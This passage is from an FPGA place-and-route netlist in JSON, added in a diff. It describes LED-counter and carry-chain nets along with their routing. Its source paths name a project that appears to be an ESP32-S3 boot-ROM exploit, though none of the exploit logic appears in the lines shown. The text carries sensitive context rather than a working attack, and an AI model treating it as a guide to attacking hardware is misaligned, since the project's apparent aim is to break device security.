"led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7779 ] , + "attributes": { + "ROUTING": "X3Y13/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7777 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7776 ] , + "attributes": { + "ROUTING": "X3Y13/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7774 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7773 ] , + "attributes": { + "ROUTING": "X4Y13/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7771 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7770 ] , + "attributes": { + "ROUTING": "X4Y13/COUT0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7768 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7767 ] , + "attributes": { + "ROUTING": "X4Y13/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7765 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7764 ] , + "attributes": { + "ROUTING": "X4Y13/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7762 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7761 ] , + "attributes": { + "ROUTING": "X4Y13/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7759 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7758 ] , + "attributes": { + "ROUTING": "X4Y13/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7756 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7755 ] , + "attributes": { + "ROUTING": "X5Y13/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7753 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7752 ] , + "attributes": { + "ROUTING": "X5Y13/COUT0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7750 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7749 ] , + "attributes": { + "ROUTING": "X5Y13/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7747 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7746 ] , + "attributes": { + "ROUTING": "X5Y13/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7744 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7743 ] , + "attributes": { + "ROUTING": "X5Y13/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "rst_DFF_Q_D_MUX2_LUT6_O_S0[5]": { + "hide_name": 0, + "bits": [ 7741 ] , + "attributes": { + "ROUTING": "X5Y12/C6;X5Y12/C6/E262;1;X3Y12/S260;X3Y12/S260/OF6;1;X3Y13/X05;X3Y13/X05/S261;1;X3Y13/SEL6;X3Y13/SEL6/X05;1;X3Y12/N260;X3Y12/N260/OF6;1;X3Y11/SEL5;X3Y11/SEL5/N261;1;X1Y12/S260;X1Y12/S260/W262;1;X3Y12/W260;X3Y12/W260/OF6;1;X1Y13/SEL1;X1Y13/SEL1/S261;1;X3Y12/OF6;;1;X3Y12/E260;X3Y12/E260/OF6;1;X5Y12/X07;X5Y12/X07/E262;1;X5Y12/D7;X5Y12/D7/X07;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21", + "force_downto": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1": { + "hide_name": 0, + "bits": [ 7740 ] , + "attributes": { + "ROUTING": "X5Y12/X06;X5Y12/X06/F1;1;X5Y12/C7;X5Y12/C7/X06;1;X5Y12/B6;X5Y12/B6/F1;1;X5Y12/F1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0": { + "hide_name": 0, + "bits": [ 7739 ] , + "attributes": { + "ROUTING": "X5Y13/SN20;X5Y13/SN20/F5;1;X5Y12/A6;X5Y12/A6/N121;1;X5Y13/F5;;1;X5Y13/N100;X5Y13/N100/F5;1;X5Y12/B7;X5Y12/B7/N101;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run[0]": { + "hide_name": 0, + "bits": [ 7737 ] , + "attributes": { + "ROUTING": "X2Y14/A6;X2Y14/A6/X06;1;X2Y8/EW10;X2Y8/EW10/Q5;1;X1Y8/S810;X1Y8/S810/W111;1;X1Y16/N210;X1Y16/N210/S818;1;X1Y14/A6;X1Y14/A6/N212;1;X2Y8/Q5;;1;X2Y8/S830;X2Y8/S830/Q5;1;X2Y16/N250;X2Y16/N250/S838;1;X2Y14/X06;X2Y14/X06/N252;1;X2Y14/A7;X2Y14/A7/X06;1", + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "led_run_DFFSE_Q_D": { + "hide_name": 0, + "bits": [ 7735 ] , + "attributes": { + "ROUTING": "X5Y12/F6;;1;X5Y12/W100;X5Y12/W100/F6;1;X4Y12/N800;X4Y12/N800/W101;1;X4Y8/W200;X4Y8/W200/N804;1;X2Y8/D5;X2Y8/D5/W202;1;X2Y8/XD5;X2Y8/XD5/D5;1" + } + }, + "led[0]": { + "hide_name": 0, + "bits": [ 7733 ] , + "attributes": { + "ROUTING": " ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21" + } + }, + "led[1]": { + "hide_name": 0, + "bits": [ 7731 ] , + "attributes": { + "ROUTING": " ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21" + } + }, + "led[2]": { + "hide_name": 0, + "bits": [ 7729 ] , + "attributes": { + "ROUTING": " ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21" + } + }, + "led[3]": { + "hide_name": 0, + "bits": [ 7727 ] , + "attributes": { + "ROUTING": " ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21" + } + }, + "led[4]": { + "hide_name": 0, + "bits": [ 7725 ] , + "attributes": { + "ROUTING": " ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21" + } + }, + "led[5]": { + "hide_name": 0, + "bits": [ 7723 ] , + "attributes": { + "ROUTING": " ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21" + } + }, + "ledCounter_DFFRE_Q_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7721 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "ledCounter_DFFRE_Q_5_D": { + "hide_name": 0, + "bits": [ 7718 ] , + "attributes": { + "ROUTING": "X1Y14/F0;;1;X1Y14/D3;X1Y14/D3/F0;1;X1Y14/XD3;X1Y14/XD3/D3;1" + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7716 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "ledCounter[0]": { + "hide_name": 0, + "bits": [ 7715 ] , + "attributes": { + "ROUTING": "X2Y14/S230;X2Y14/S230/E131;1;X2Y15/B3;X2Y15/B3/S231;1;X1Y14/W130;X1Y14/W130/Q3;1;X0Y14/A0;X0Y14/A0/W131;1;X1Y14/N100;X1Y14/N100/Q3;1;X1Y14/A0;X1Y14/A0/N100;1;X1Y14/Q3;;1;X1Y14/E130;X1Y14/E130/Q3;1;X2Y14/B1;X2Y14/B1/E131;1", + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM_CIN": { + "hide_name": 0, + "bits": [ 7712 ] , + "attributes": { + "ROUTING": "X2Y14/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "ledCounter[1]": { + "hide_name": 0, + "bits": [ 7710 ] , + "attributes": { + "ROUTING": "X2Y14/S130;X2Y14/S130/Q2;1;X2Y15/A3;X2Y15/A3/S131;1;X2Y14/S100;X2Y14/S100/Q2;1;X2Y15/W200;X2Y15/W200/S101;1;X0Y15/D1;X0Y15/D1/W202;1;X2Y14/Q2;;1;X2Y14/X01;X2Y14/X01/Q2;1;X2Y14/B2;X2Y14/B2/X01;1", + "force_downto": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:130.20-130.21" + } + }, + "ledCounter_DFFRE_Q_4_D": { + "hide_name": 0, + "bits": [ 7708 ] , + "attributes": { + "ROUTING": "X2Y14/F2;;1;X2Y14/XD2;X2Y14/XD2/F2;1" + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7706 ] , + "attributes": { + "ROUTING": "X2Y14/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "ledCounter[2]": { + "hide_name": 0, + "bits": [ 7704 ] , + "attributes": { + "ROUTING": "X2Y14/S800;X2Y14/S800/Q3;1;X2Y22/N200;X2Y22/N200/S808;1;X2Y20/W200;X2Y20/W200/N202;1;X0Y20/D1;X0Y20/D1/W202;1;X2Y14/SN10;X2Y14/SN10/Q3;1;X2Y15/D5;X2Y15/D5/S111;1;X2Y14/Q3;;1;X2Y14/B3;X2Y14/B3/Q3;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:26.11-26.21" + } + }, + "ledCounter_DFFRE_Q_3_D": { + "hide_name": 0, + "bits": [ 7703 ] , + "attributes": { + "ROUTING": "X2Y14/F3;;1;X2Y14/XD3;X2Y14/XD3/F3;1" + } + }, + "ledCounter_DFFRE_Q_3_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7701 ] , + "attributes": { + "ROUTING": "X2Y14/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "ledCounter[3]": { + "hide_name": 0, + "bits": [ 7699 ] , + "attributes": { + "ROUTING": "X2Y14/S240;X2Y14/S240/Q4;1;X2Y15/X05;X2Y15/X05/S241;1;X2Y15/C5;X2Y15/C5/X05;1;X2Y21/W200;X2Y21/W200/S808;1;X0Y21/D1;X0Y21/D1/W202;1;X2Y14/N100;X2Y14/N100/Q4;1;X2Y13/S800;X2Y13/S800/N101;1;X2Y14/Q4;;1;X2Y14/X03;X2Y14/X03/Q4;1;X2Y14/B4;X2Y14/B4/X03;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:26.11-26.21" + } + }, + "ledCounter_DFFRE_Q_2_D": { + "hide_name": 0, + "bits": [ 7698 ] , + "attributes": { + "ROUTING": "X2Y14/F4;;1;X2Y14/XD4;X2Y14/XD4/F4;1" + } + }, + "ledCounter_DFFRE_Q_1_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7696 ] , + "attributes": { + "ROUTING": "X3Y14/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "ledCounter_DFFRE_Q_2_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 7695 ] , + "attributes": { + "ROUTING": "X2Y14/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "ledCounter[4]": { + "hide_name": 0, + "bits": [ 7693 ] , + "attributes": { + "ROUTING": "X2Y14/SN20;X2Y14/SN20/Q5;1;X2Y15/B5;X2Y15/B5/S121;1;X2Y14/S830;X2Y14/S830/Q5;1;X2Y22/W250;X2Y22/W250/S838;1;X0Y22/S250;X0Y22/S250/W252;1;X0Y24/X06;X0Y24/X06/S252;1;X0Y24/D1;X0Y24/D1/X06;1;X2Y14/Q5;;1;X2Y14/X08;X2Y14/X08/Q5;1;X2Y14/B5;X2Y14/B5/X08;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:26.11-26.21" + } + }, + "ledCounter_DFFRE_Q_1_D": { + "hide_name": 0, + "bits": [ 7692 ] , + "attributes": { + "ROUTING": "X2Y14/F5;;1;X2Y14/XD5;X2Y14/XD5/F5;1" + } + }, + "led_run_LUT3_I0_F_MUX2_LUT5_I0_O": { + "hide_name": 0, + "bits": [ 7690 ] , + "attributes": { + "ROUTING": "X2Y14/W260;X2Y14/W260/OF6;1;X0Y14/W270;X0Y14/W270/W262;1;X1Y14/LSR1;X1Y14/LSR1/E272;1;X0Y14/E270;X0Y14/E270/E272;1;X2Y14/LSR1;X2Y14/LSR1/E272;1;X2Y14/OF6;;1;X2Y14/W130;X2Y14/W130/OF6;1;X2Y14/LSR2;X2Y14/LSR2/E272;1;X1Y14/W270;X1Y14/W270/W131;1" + } + }, + "ledCounter[5]": { + "hide_name": 0, + "bits": [ 7689 ] , + "attributes": { + "ROUTING": "X1Y14/EW20;X1Y14/EW20/Q2;1;X0Y14/S820;X0Y14/S820/W121;1;X0Y22/S100;X0Y22/S100/S828;1;X0Y23/S200;X0Y23/S200/S101;1;X0Y25/D1;X0Y25/D1/S202;1;X1Y14/EW10;X1Y14/EW10/Q2;1;X2Y14/S210;X2Y14/S210/E111;1;X2Y15/A5;X2Y15/A5/S211;1;X1Y14/Q2;;1;X1Y14/E220;X1Y14/E220/Q2;1;X3Y14/X05;X3Y14/X05/E222;1;X3Y14/B0;X3Y14/B0/X05;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:26.11-26.21" + } + }, + "ledCounter_DFFRE_Q_D": { + "hide_name": 0, + "bits": [ 7688 ] , + "attributes": { + "ROUTING": "X3Y14/F0;;1;X3Y14/W200;X3Y14/W200/F0;1;X1Y14/D2;X1Y14/D2/W202;1;X1Y14/XD2;X1Y14/XD2/D2;1" + } + }, + "led_run_LUT4_I0_F": { + "hide_name": 0, + "bits": [ 7687 ] , + "attributes": { + "ROUTING": 